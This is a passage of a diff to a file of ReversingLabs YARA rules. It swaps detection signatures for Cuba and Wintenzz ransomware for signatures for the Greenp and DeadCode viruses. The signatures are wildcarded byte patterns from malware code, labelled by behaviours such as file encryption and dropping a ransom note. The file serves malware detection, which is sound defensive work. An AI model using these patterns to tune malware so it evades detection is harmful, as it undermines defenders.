00 74 03 46 + EB F8 46 8B CE 2B CB 8B F3 8B BD ?? ?? ?? ?? 57 8B 3F 03 FA 51 F3 A6 + 74 0F 8B F3 59 5F 83 C7 04 FF 85 ?? ?? ?? ?? EB E7 59 5F 8B 85 ?? ?? + ?? ?? D1 E0 03 85 ?? ?? ?? ?? 33 DB 66 8B 18 C1 E3 02 03 9D ?? ?? ?? + ?? 8B 1B 03 DA 8B C3 C3 50 52 33 D2 8B C6 F7 F3 2B DA 03 F3 5A 58 C3 + 8B 85 ?? ?? ?? ?? 6A 00 50 6A 00 6A 04 6A 00 FF B5 ?? ?? ?? ?? FF 95 + ?? ?? ?? ?? 85 C0 74 1E 89 85 ?? ?? ?? ?? 6A 00 6A 00 6A 00 6A 02 FF + B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 85 C0 75 02 33 C0 89 85 ?? ?? ?? ?? + C3 33 C0 50 68 80 00 00 00 6A 03 50 40 50 68 00 00 00 C0 8D B5 ?? ?? + ?? ?? 56 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C3 85 ED 0F 84 2A 04 00 + 00 33 C0 05 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 } condition: - uint16(0)==0x5A4D and (( all of ($main_ransomware_function_p*)) and $search_files and $encrypt_files) + uint16(0)==0x5A4D and ($cmay_body_1 at pe.entry_point) and $cmay_body_2 } -rule REVERSINGLABS_Win32_Ransomware_Cuba : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Greenp : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Cuba ransomware." + description = "Yara rule that detects Greenp virus." author = "ReversingLabs" - id = "b2c81849-9fa6-58b6-b6fe-4d9a5f0923ea" + id = "5751e91c-652b-59bd-93b8-ece677ad4911" date = "2020-07-15" modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Cuba.yara#L1-L126" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0a8dea6e38a6407897b994ea119bc8b0712a94363b7b3942dcd32c65ee5548d4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.Greenp.yara#L3-L46" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ca6df34ee2ad9d93e35b0d1a2d4765f681f3981ffe2786bbc822c3090212fd02" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Cuba" + tc_detection_type = "Virus" + tc_detection_name = "Greenp" tc_detection_factor = 5 importance = 25 strings: - $find_files_p1 = { - 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8B D7 8D 4D ?? E8 ?? - ?? ?? ?? 83 C4 ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? - 0F B7 00 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? - 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 - ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 83 7D ?? ?? 8D 45 ?? 0F 43 - 45 ?? 0F B7 40 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 - 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B D3 C6 - 45 ?? ?? 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D - ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 - ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 55 ?? - 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 75 ?? 8B 5D ?? 83 FB ?? 8B 7D ?? 8B 45 ?? 0F - 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? - 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 - ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? - ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 - } - $find_files_p2 = { - 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? - 8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 - ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8 - ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 - ?? EB ?? 83 7D ?? ?? 75 ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 FA ?? 0F 43 C1 66 83 38 ?? - 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 - 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 74 ?? 8B 8D ?? ?? ?? ?? - 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? C6 45 ?? ?? 83 FB ?? 72 ?? 8D 0C 5D ?? - ?? ?? ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 83 C0 ?? 83 F8 ?? 0F - 87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B - 9D ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B - C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? - ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 55 ?? C7 45 - ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA - ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? - ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 - } - $enum_resources = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B DA 89 5D ?? 8D 45 ?? C7 45 ?? ?? ?? - ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 32 - C0 E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 66 90 - FF 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15 - ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 83 7E ?? ?? 0F 85 - ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 56 ?? 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 58 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C3 8D 4D - ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8B CB C7 45 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? - 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 - E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? 8B D3 E8 ?? ?? ?? ?? 47 - 83 C6 ?? 3B 7D ?? 0F 82 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF - 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B - 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $encrypt_files_p1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 7D ?? 0F 57 C0 66 0F 13 45 ?? - C7 45 ?? ?? ?? ?? ?? 8B C7 83 7F ?? ?? 72 ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? - 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 75 ?? FF 15 ?? ?? - ?? ?? 32 DB E9 ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 - ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8E ?? ?? ?? ?? 6A ?? 8D - 41 ?? 50 6A ?? 8D 56 ?? 51 52 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 53 FF 15 - ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 8D 45 ?? 8B CE - 50 E8 ?? ?? ?? ?? EB ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 6A ?? EB ?? 6A ?? 8D - 45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 75 ?? 8A D8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 83 - CE ?? 89 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ?? - 83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 83 7F ?? ?? 72 ?? 8B 3F 50 57 FF 15 ?? ?? - ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? - 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? - 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 FE ?? 74 ?? 56 FF 15 - ?? ?? ?? ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? - ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? CC CC CC 55 8B EC 83 E4 ?? 81 EC - } - $encrypt_files_p2 = { - A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B 5D ?? 56 57 8B F9 89 5C 24 ?? 6A ?? - 8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 8B 17 8B 47 ?? 2B C2 50 52 FF 33 FF 15 ?? ?? - ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 - CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 44 24 ?? 8B 57 ?? 8B 0F 89 44 24 ?? 89 54 24 - ?? 89 4C 24 ?? 85 C0 7E ?? 8B D8 8B 47 ?? 8B F3 2B 47 ?? 3B D8 52 0F 43 F0 8D 47 ?? - 56 51 50 E8 ?? ?? ?? ?? 56 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 2B DE - 8B 54 24 ?? 03 CE 83 C4 ?? 89 4C 24 ?? 85 DB 7F ?? 8B 5C 24 ?? 6A ?? 6A ?? 0F 57 C0 - 66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 33 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? - 85 C0 75 ?? FF D6 89 43 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ?? - ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ?? - 89 44 24 ?? 8D 87 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 4C 24 ?? ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24 - ?? ?? ?? ?? ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 89 43 ?? 6A ?? 8D 44 24 - ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF 37 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? - FF D6 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 - ?? ?? 8B 8C 24 ?? ?? ?? ?? B0 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2 + $greenp_body_1 = { + 68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01 + 50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC + 6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00 + FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? + ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF + 95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46 + 0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4 + 68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ?? + ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 + 8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43 + 10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42 + 50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ?? + ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99 + } + $greenp_body_2 = { + 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95 + ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ?? + ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ?? + ?? ?? C3 } condition: - uint16(0)==0x5A4D and ($enum_resources) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ($greenp_body_1 at pe.entry_point) and $greenp_body_2 } -rule REVERSINGLABS_Win64_Ransomware_Wintenzz : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Win32_Virus_Deadcode : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Wintenzz ransomware." + description = "Yara rule that detects DeadCode virus." author = "ReversingLabs" - id = "6bf569e8-b050-51ef-a948-0eb294248d63" - date = "2021-11-02" - modified = "2021-11-02" + id = "89ec2e39-a163-5ba6-9b19-9c94b1923d47" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win64.Ransomware.Wintenzz.yara#L1-L83" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ff4bdf2f6ee185b98d0014b3066806fe7e25ea94f46837948bc5262440bf8a56" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/virus/Win32.Virus.DeadCode.yara#L3-L76" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6ac2e48daaed222f0a19afd4d03a02834705e0e3762db3217f68569554171846" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Wintenzz" + tc_detection_type = "Virus" + tc_detection_name = "DeadCode" tc_detection_factor = 5 importance = 25 strings: - $find_files = { - 48 8D 75 ?? 41 B8 ?? ?? ?? ?? 48 89 F1 31 D2 E8 ?? ?? ?? ?? 48 89 F9 48 89 F2 E8 ?? - ?? ?? ?? 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 89 C6 48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? - ?? ?? 0F 28 85 ?? ?? ?? ?? 0F 29 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? - ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 11 00 0F 28 85 ?? ?? ?? - ?? 0F 11 40 ?? 48 8B 8D ?? ?? ?? ?? 48 89 48 ?? 49 89 77 ?? 49 89 47 ?? 41 C7 47 ?? - ?? ?? ?? ?? 49 8D 4F ?? 48 8D 55 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 B6 ?? 31 C0 - 49 89 07 48 85 DB 75 ?? EB ?? E8 ?? ?? ?? ?? 48 C1 E0 ?? 49 89 47 ?? 49 C7 47 ?? ?? - ?? ?? ?? B8 ?? ?? ?? ?? 31 F6 49 89 07 48 85 DB 74 ?? 48 01 DB 74 ?? 41 B8 ?? ?? ?? - ?? 48 89 F9 48 89 DA E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? - ?? ?? 4C 89 F1 E8 ?? ?? ?? ?? 40 84 F6 75 ?? 48 8B 8D ?? ?? ?? ?? 48 85 C9 74 ?? 48 - 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F8 48 81 C4 - ?? ?? ?? ?? 5B 5F 5E 41 5E 41 5F 5D C3 BA + $deadcode_ep_1 = { + 64 67 FF 36 30 00 58 8B 40 08 FF 70 48 5B FF 70 4C 5A 03 40 44 + FF E0 } - $encrypt_files_p1 = { - 4C 89 75 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D - 05 ?? ?? ?? ?? 48 89 45 ?? 48 8D 05 ?? ?? ?? ?? 48 89 45 ?? 48 C7 45 ?? ?? ?? ?? ?? - 48 C7 45 ?? ?? ?? ?? ?? 48 89 7D ?? 48 C7 45 ?? ?? ?? ?? ?? 48 8D 4D ?? 48 8D 55 ?? - E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 29 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 4D ?? 48 8D 55 - ?? E8 ?? ?? ?? ?? 48 85 DB 74 ?? BA ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 85 C0 75 - ?? BA ?? ?? ?? ?? 48 89 D9 E8 + $deadcode_marker = { + DE C0 AD DE } - $encrypt_files_p2 = { - 86 97 ?? ?? ?? ?? C0 74 3C ?? ?? C1 E8 ?? 28 03 00 48 ?? C0 74 2F ?? ?? FA 03 75 ?? - 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 - ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? ?? 48 85 - C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D ?? ?? ?? - ?? 48 39 C8 0F 84 ?? ?? ?? ?? 81 38 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B - 55 ?? E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA - ?? 75 ?? 48 8D 0D ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? - 0F B6 40 ?? 83 F0 ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D ?? 48 8B 55 ?? E8 ?? ?? ?? - ?? 48 85 C0 74 ?? 48 89 C1 E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 FA ?? 75 ?? 48 8D 0D - ?? ?? ?? ?? 48 39 C8 0F 84 ?? ?? ?? ?? 0F B7 08 81 F1 ?? ?? ?? ?? 0F B6 40 ?? 83 F0 - ?? 66 09 C8 0F 84 ?? ?? ?? ?? 48 8B 4D + $deadcode_ep_2 = { + 2B C0 85 C0 74 0E 64 67 FF 36 00 00 64 67 89 26 00 00 89 00 E8 + ED FF FF FF 8B 74 24 0C 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 + 4C 03 40 44 89 86 B8 00 00 00 89 86 B0 00 00 00 89 9E A4 00 00 + 00 89 96 A8 00 00 00 2B C0 C3 } - $drop_ransom_note = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? - ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 8B 8D - ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 ?? 48 - 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 D2 74 - ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 85 - D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? - 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 95 ?? ?? - ?? ?? 48 85 D2 74 ?? 48 8B 8D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 40 84 F6 - 0F 85 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 48 8B 55 ?? 48 85 D2 74 ?? 41 B8 ?? ?? ?? ?? 48 8B 8D ?? ?? ?? ?? E8 - ?? ?? ?? ?? 48 8B 55 + $deadcode_ep_3 = { + B8 DE C0 AD DE 50 5A 64 67 A1 30 00 8B 40 08 8B 58 48 8B 50 4C + 03 40 44 FF D0 + } + $deadcode_body_1 = { + 8B D0 8B EA 81 C5 ?? ?? ?? ?? 89 85 A4 00 00 00 89 9D C0 00 00 00 E8 56 01 00 00 89 + 45 00 8D 75 04 81 C2 ?? ?? ?? ?? 6A 19 FF 75 00 52 56 E8 CE 01 00 00 64 67 A1 30 00 + 8B 40 08 89 85 88 00 00 00 C7 85 D0 00 00 00 ?? ?? ?? ?? E8 09 00 00 00 8B 64 24 08 + E9 03 01 00 00 33 D2 64 FF 32 64 89 22 83 BD C0 00 00 00 00 75 2F 6A 04 68 00 10 00 + 00 68 40 01 00 00 6A 00 FF 55 08 50 8F 45 78 E8 2A 03 00 00 68 00 40 00 00 68 40 01 + 00 00 FF 75 78 FF 55 28 E9 C3 00 00 00 8B 85 A4 00 00 00 05 ?? ?? ?? ?? 8D B5 B4 00 + 00 00 56 6A 00 55 50 68 00 00 10 00 6A 00 FF 55 30 89 85 AC 00 00 00 6A 04 68 00 10 + 00 00 6A 54 6A 00 FF 55 08 89 85 A8 00 00 00 64 67 A1 30 00 8B 40 10 8B 40 3C 8B B5 + A8 00 00 00 8D 7E 10 56 57 6A 00 6A 00 6A 04 6A 01 6A 00 6A 00 50 6A 00 FF 55 50 85 + C0 74 5D FF 76 04 8F 85 B0 00 00 00 64 67 A1 30 00 8B 40 08 8B D8 03 5B 3C 8B 5B 28 + 03 D8 8B 8D A4 00 00 00 81 ?? ?? ?? ?? 8D 85 B4 00 00 00 50 6A ?? 51 53 FF 36 FF 55 + 4C FF 76 04 FF 55 54 8D B5 AC 00 00 00 6A FF 6A 01 56 6A 02 FF 55 34 68 00 40 00 00 + 6A 54 FF B5 A8 00 00 00 FF 55 28 33 D2 64 8F 02 5A E8 DB 01 00 00 E8 F5 00 00 00 6A + 00 FF 55 3C 64 67 